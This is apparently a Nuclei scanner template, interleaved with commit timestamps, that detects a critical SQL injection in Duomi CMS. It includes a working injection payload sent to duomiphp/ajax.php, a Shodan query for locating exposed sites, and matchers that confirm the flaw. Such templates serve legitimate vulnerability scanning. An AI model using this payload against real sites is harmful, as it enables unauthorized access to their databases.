2021-02-26 15:44:31 +00:00
id : duomicms-sql-injection
info :
2022-09-29 13:38:41 +00:00
name : Duomi CMS - SQL Injection
2021-02-26 15:44:31 +00:00
author : pikpikcu
2022-09-29 13:38:41 +00:00
severity : critical
description : Duomi CMS contains a SQL injection vulnerability. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
2022-04-22 10:38:41 +00:00
reference :
- https://redn3ck.github.io/2016/11/01/duomiCMS/
2022-09-29 13:38:41 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score : 10.0
cwe-id : CWE-89
2022-06-28 12:59:31 +00:00
metadata :
2022-06-28 13:50:23 +00:00
verified : true
shodan-query : title:"DuomiCMS"
2021-02-26 15:44:31 +00:00
tags : duomicms,sqli
2022-06-30 02:54:58 +00:00
2022-06-30 02:48:22 +00:00
variables :
num : "999999999"
2021-02-26 15:44:31 +00:00
requests :
- method : GET
path :
2022-06-30 02:48:22 +00:00
- "{{BaseURL}}/duomiphp/ajax.php?action=addfav&id=1&uid=1%20and%20extractvalue(1,concat_ws(1,1,md5({{num}})))"
2021-02-26 15:44:31 +00:00
matchers-condition : and
matchers :
- type : word
words :
2022-06-30 02:48:22 +00:00
- '{{md5({{num}})}}'
2021-02-26 15:44:31 +00:00
- type : status
status :
- 200
2022-09-29 13:38:41 +00:00
# Enhanced by md on 2022/09/28